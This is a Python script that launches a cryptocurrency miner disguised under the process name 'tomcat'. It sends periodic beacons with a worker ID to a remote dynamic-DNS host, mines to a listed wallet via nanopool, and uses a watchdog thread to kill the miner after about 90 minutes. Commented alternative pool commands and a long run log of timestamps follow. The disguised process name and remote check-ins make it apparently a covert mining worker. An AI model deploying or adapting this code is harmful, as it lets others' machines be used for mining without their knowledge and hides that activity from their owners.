import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:42:07.074137
#2018-02-17 16:29:05.896723
#2018-02-17 18:17:03.745253
#2018-02-17 20:04:07.609187
#2018-02-17 21:53:03.177681
#2018-02-17 23:38:04.393556
#2018-02-18 01:26:07.486771
#2018-02-18 03:13:02.186859
#2018-02-18 05:02:04.017846
#2018-02-18 06:55:07.544972
#2018-02-18 08:44:01.308174
#2018-02-18 10:31:06.521502
#2018-02-18 12:16:05.455566
#2018-02-18 14:02:07.655450
#2018-02-18 15:52:05.310430
#2018-02-18 17:42:05.612717
#2018-02-18 19:29:05.745224
#2018-02-18 21:14:04.777251
#2018-02-18 23:02:06.338484
#2018-02-19 00:49:05.294032
#2018-02-19 02:35:08.256782
#2018-02-19 04:21:04.433070
#2018-02-19 06:06:05.808379
#2018-02-19 07:54:05.133464
#2018-02-19 09:44:06.873364
#2018-02-19 11:34:06.162003
#2018-02-19 13:21:06.524816
#2018-02-19 15:08:01.365278
#2018-02-19 16:56:09.388057
#2018-02-19 18:44:01.387192
#2018-02-19 20:33:07.716017
#2018-02-19 22:19:04.115837
#2018-02-20 00:06:01.277061
#2018-02-20 01:52:05.472132
#2018-02-20 03:40:08.837010
#2018-02-20 05:27:06.317200
#2018-02-20 07:11:04.392795
#2018-02-20 08:56:05.447599
#2018-02-20 10:41:01.421028
#2018-02-20 12:27:07.851706
#2018-02-20 14:13:09.374819
#2018-02-20 15:57:06.869076
#2018-02-20 17:44:07.921056
#2018-02-20 19:37:04.926457
#2018-02-20 21:26:04.200970
#2018-02-20 23:08:04.817876
#2018-02-21 00:53:04.378536
#2018-02-21 02:39:06.951818
#2018-02-21 04:28:06.005986
#2018-02-21 06:17:04.470199
#2018-02-21 08:03:03.518029
#2018-02-21 09:48:07.863535
#2018-02-21 11:39:06.645102
#2018-02-21 13:28:09.507948
#2018-02-21 15:14:09.681442
#2018-02-21 17:06:08.974537
#2018-02-21 18:54:01.808962
#2018-02-21 20:44:07.155038
#2018-02-21 22:30:07.522880
#2018-02-22 00:20:09.112366
#2018-02-22 02:08:03.464266
#2018-02-22 03:54:06.071964
#2018-02-22 05:41:06.537093
#2018-02-22 07:26:05.729040
#2018-02-22 09:14:05.939783
#2018-02-22 11:01:06.995918
#2018-02-22 12:46:12.460297
#2018-02-22 14:31:04.897005
#2018-02-22 16:18:06.868329
#2018-02-22 18:06:01.917587
#2018-02-22 19:56:05.567260
#2018-02-22 21:45:08.219008
#2018-02-22 23:32:08.130255
#2018-02-23 01:21:04.965169
#2018-02-23 03:08:01.475657
#2018-02-23 04:54:07.419158
#2018-02-23 06:39:07.760853
#2018-02-23 08:27:05.402717
#2018-02-23 10:43:07.276342
#2018-02-23 12:40:04.202311
#2018-02-23 14:23:04.249649
#2018-02-23 16:14:05.469102
#2018-02-23 18:01:04.825223
#2018-02-23 19:46:05.195056
#2018-02-23 21:28:07.618937
#2018-02-23 23:18:05.111288
#2018-02-24 01:08:07.459273
#2018-02-24 03:01:01.593586
#2018-02-24 04:47:04.717527
#2018-02-24 06:33:01.816889
#2018-02-24 08:21:03.706826
#2018-02-24 10:05:02.251200
#2018-02-24 12:02:03.881297
#2018-02-24 13:50:01.376345
#2018-02-24 15:43:05.149669
#2018-02-24 17:36:07.819166
#2018-02-24 19:22:02.163787
#2018-02-24 21:13:02.263250
#2018-02-24 23:48:04.977687
#2018-02-25 03:42:02.157434
#2018-02-25 07:27:03.702334